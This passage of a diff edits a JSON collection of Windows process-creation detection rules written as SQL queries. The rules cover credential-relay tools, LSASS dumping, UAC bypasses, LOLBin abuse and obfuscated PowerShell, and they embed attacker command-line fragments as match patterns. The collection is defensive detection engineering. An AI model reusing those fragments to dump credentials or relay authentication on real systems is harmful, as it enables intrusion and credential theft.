LIKE '%PetitPotam%' ESCAPE '\\' OR NewProcessName LIKE '%RottenPotato%' ESCAPE '\\' OR NewProcessName LIKE '%HotPotato%' ESCAPE '\\' OR NewProcessName LIKE '%JuicyPotato%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\just\\_dce\\_%' ESCAPE '\\' OR NewProcessName LIKE '%Juicy Potato%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\temp\\\\rot.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Potato.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SpoolSample.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Responder.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\LocalPotato%' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '% smbrelay%' ESCAPE '\\' OR CommandLine LIKE '% ntlmrelay%' ESCAPE '\\' OR CommandLine LIKE '%cme smb %' ESCAPE '\\' OR CommandLine LIKE '% /ntlm:NTLMhash %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PetitPotam%' ESCAPE '\\' OR CommandLine LIKE '%.exe -t % -p %' ESCAPE '\\') OR (CommandLine LIKE '%.exe -c \"{%' ESCAPE '\\' AND CommandLine LIKE '%}\" -z' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%HotPotatoes6%' ESCAPE '\\' OR NewProcessName LIKE '%HotPotatoes7%' ESCAPE '\\' OR NewProcessName LIKE '%HotPotatoes %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_relay_attacks_tools.yml" + "filename": "proc_creation_win_malware_pingback_backdoor.yml" }, { - "title": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe", - "id": "65d2be45-8600-4042-b4c0-577a1ff8a60e", + "title": "Execute Files with Msdeploy.exe", + "id": "646bc99f-6682-4b47-a73a-17b1b64c9d34", "status": "test", - "description": "Detects defence evasion attempt via odbcconf.exe execution to load DLL", - "author": "Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community", + "description": "Detects file execution using the msdeploy.exe lolbin", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.008" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Legitimate use of odbcconf.exe by legitimate user" + "System administrator Usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR OriginalFileName = 'odbcconf.exe') AND (CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%-f%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%/f%' ESCAPE '\\' OR CommandLine LIKE '%regsvr%' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%verb:sync%' ESCAPE '\\' AND CommandLine LIKE '%-source:RunCommand%' ESCAPE '\\' AND CommandLine LIKE '%-dest:runCommand%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\msdeploy.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_odbcconf_susp_exec.yml" + "filename": "proc_creation_win_lolbin_msdeploy.yml" }, { - "title": "UAC Bypass WSReset", - "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", - "status": "test", - "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", - "author": "Christian Burkard (Nextron Systems)", + "title": "Persistence Via TypedPaths - CommandLine", + "id": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", + "status": "experimental", + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" + "filename": "proc_creation_win_registry_typed_paths_persistence.yml" }, { - "title": "HackTool - winPEAS Execution", - "id": "98b53e78-ebaf-46f8-be06-421aafd176d9", + "title": "Windows Hotfix Updates Reconnaissance Via Wmic.EXE", + "id": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", "status": "experimental", - "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz", - "author": "Georg Lauenstein (sure[secure])", + "description": "Detects the execution of wmic with the \"qfe\" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1082", - "attack.t1087", - "attack.t1046" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'winPEAS.exe' OR (NewProcessName LIKE '%\\\\winPEASany.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASany\\_ofs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx64\\_ofs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx86\\_ofs.exe' ESCAPE '\\') OR (CommandLine LIKE '% applicationsinfo%' ESCAPE '\\' OR CommandLine LIKE '% browserinfo%' ESCAPE '\\' OR CommandLine LIKE '% eventsinfo%' ESCAPE '\\' OR CommandLine LIKE '% fileanalysis%' ESCAPE '\\' OR CommandLine LIKE '% filesinfo%' ESCAPE '\\' OR CommandLine LIKE '% processinfo%' ESCAPE '\\' OR CommandLine LIKE '% servicesinfo%' ESCAPE '\\' OR CommandLine LIKE '% windowscreds%' ESCAPE '\\') OR CommandLine LIKE '%https://github.com/carlospolop/PEASS-ng/releases/latest/download/%' ESCAPE '\\' OR ParentCommandLine LIKE '% -linpeas' ESCAPE '\\' OR CommandLine LIKE '% -linpeas' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '% qfe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_winpeas.yml" + "filename": "proc_creation_win_wmic_recon_hotfix.yml" }, { - "title": "Suspicious Mofcomp Execution", - "id": "1dd05363-104e-4b4a-b963-196a534b03a1", - "status": "experimental", - "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Trickbot Malware Reconnaissance Activity", + "id": "410ad193-a728-4107-bc79-4419789fcbf8", + "status": "test", + "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", + "author": "David Burkett, Florian Roth", "tags": [ - "attack.execution", - "attack.t1218" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Rare System Admin Activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mofcomp.exe' ESCAPE '\\' OR OriginalFileName = 'mofcomp.exe') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mofcomp_execution.yml" + "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" }, { - "title": "Delete All Scheduled Tasks", - "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", - "status": "experimental", - "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - DInjector PowerShell Cradle Execution", + "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", + "status": "test", + "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_delete_all.yml" + "filename": "proc_creation_win_hktl_dinjector.yml" }, { - "title": "Hermetic Wiper TG Process Patterns", - "id": "2f974656-6d83-4059-bbdf-68ac5403422f", - "status": "experimental", - "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation", + "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", + "status": "test", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.lateral_movement", - "attack.t1021.001" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" }, { - "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage", - "id": "37651c2a-42cd-4a69-ae0d-22a4349aa04a", - "status": "experimental", - "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Rundll32 Execution Without Parameters", + "id": "5bb68627-3198-40ca-b458-49f973db8752", + "status": "test", + "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.persistence", - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Installation of unsigned packages for testing purposes" + "False positives may occur if a user called rundll32 from CLI with no options" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AppPackage %' ESCAPE '\\' OR CommandLine LIKE '%Add-AppxPackage %' ESCAPE '\\') AND CommandLine LIKE '% -AllowUnsigned%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine IN ('rundll32.exe', 'rundll32'))" ], - "filename": "proc_creation_win_powershell_install_unsigned_appx_packages.yml" + "filename": "proc_creation_win_rundll32_without_parameters.yml" }, { - "title": "Fireball Archer Install", - "id": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", + "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", + "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", "status": "test", - "description": "Detects Archer malware invocation via rundll32", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ "attack.execution", - "attack.defense_evasion", - "attack.t1218.011" + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%InstallArcherSvc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_fireball.yml" + "filename": "proc_creation_win_schtasks_reg_loader.yml" }, { - "title": "Exploited CVE-2020-10189 Zoho ManageEngine", - "id": "846b866e-2a57-46ee-8e16-85fa92759be7", + "title": "Suspicious MSHTA Child Process", + "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", "status": "test", - "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", + "author": "Michael Haag", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.s0190", - "cve.2020.10189" + "attack.defense_evasion", + "attack.t1218.005", + "car.2013-02-003", + "car.2013-03-001", + "car.2014-04-003" ], "falsepositives": [ - "Unknown" + "Printer software / driver installations", + "HP software" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" ], - "filename": "proc_creation_win_exploit_cve_2020_10189.yml" + "filename": "proc_creation_win_mshta_susp_child_processes.yml" }, { - "title": "Sysmon Configuration Update", - "id": "87911521-7098-470b-a459-9a57fc80bdfd", - "status": "test", - "description": "Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely", + "title": "Launch-VsDevShell.PS1 Proxy Execution", + "id": "45d3a03d-f441-458c-8883-df101a3bb146", + "status": "experimental", + "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1216.001" ], "falsepositives": [ - "Legitimate administrators might use this command to update Sysmon configuration." + "Legitimate usage of the script by a developer" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-c%' ESCAPE '\\' OR CommandLine LIKE '%/c%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Launch-VsDevShell.ps1%' ESCAPE '\\' AND (CommandLine LIKE '%VsWherePath %' ESCAPE '\\' OR CommandLine LIKE '%VsInstallationPath %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_sysmon_config_update.yml" + "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml" }, { - "title": "Potential LSASS Process Dump Via Procdump", - "id": "5afee48e-67dd-4e03-a783-f74259dcf998", - "status": "stable", - "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", - "author": "Florian Roth (Nextron Systems)", + "title": "Winrar Execution in Non-Standard Folder", + "id": "4ede543c-e098-43d9-a28f-dd784a13132f", + "status": "test", + "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", + "author": "Florian Roth (Nextron Systems), Tigzy", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.credential_access", - "attack.t1003.001", - "car.2013-05-009" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unlikely, because no one should dump an lsass process memory", - "Another tool that uses the command line switches of Procdump" + "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((NewProcessName LIKE '%\\\\WinRAR%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" + "filename": "proc_creation_win_winrar_execution.yml" }, { - "title": "HackTool - WinRM Access Via Evil-WinRM", - "id": "a197e378-d31b-41c0-9635-cfdf1c1bb423", + "title": "Execute Code with Pester.bat", + "id": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", "status": "test", - "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", - "author": "frack113", + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1021.006" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Unknown" + "Legitimate use of Pester for writing tests for Powershell scripts and modules" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ruby.exe' ESCAPE '\\' AND CommandLine LIKE '%-i %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Pester%' ESCAPE '\\' AND CommandLine LIKE '%Get-Help%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%pester%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\' AND (CommandLine LIKE '%help%' ESCAPE '\\' OR CommandLine LIKE '%_%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_evil_winrm.yml" + "filename": "proc_creation_win_lolbin_pester_1.yml" }, { - "title": "Execution via Diskshadow.exe", - "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", - "status": "test", - "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", - "author": "Ivan Dyachkov, oscd.community", + "title": "HackTool - Wmiexec Default Powershell Command", + "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", + "status": "experimental", + "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218" + "attack.defense_evasion", + "attack.lateral_movement" ], "falsepositives": [ - "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_diskshadow.yml" + "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" }, { - "title": "ZOHO Dctask64 Process Injection", - "id": "6345b048-8441-43a7-9bed-541133633d7a", + "title": "Arbitrary Command Execution Using WSL", + "id": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", "status": "test", - "description": "Detects suspicious process injection using ZOHO's dctask64.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary linux and windows commands", + "author": "oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1055.001" + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Unknown" + "Automation and orchestration scripts may use this method to execute scripts etc.", + "Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR OriginalFileName = 'wsl.exe') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --exec%' ESCAPE '\\' OR CommandLine LIKE '% --system%' ESCAPE '\\' OR CommandLine LIKE '% --shell-type %' ESCAPE '\\' OR CommandLine LIKE '% /mnt/c%' ESCAPE '\\' OR CommandLine LIKE '% --user root%' ESCAPE '\\' OR CommandLine LIKE '% -u root%' ESCAPE '\\' OR CommandLine LIKE '%--debug-shell%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -e kill %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" + "filename": "proc_creation_win_wsl_lolbin_execution.yml" }, { - "title": "UAC Bypass Using ChangePK and SLUI", - "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", - "status": "test", - "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Script Execution From Temp Folder", + "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "status": "experimental", + "description": "Detects a suspicious script executions from temporary folder", + "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE 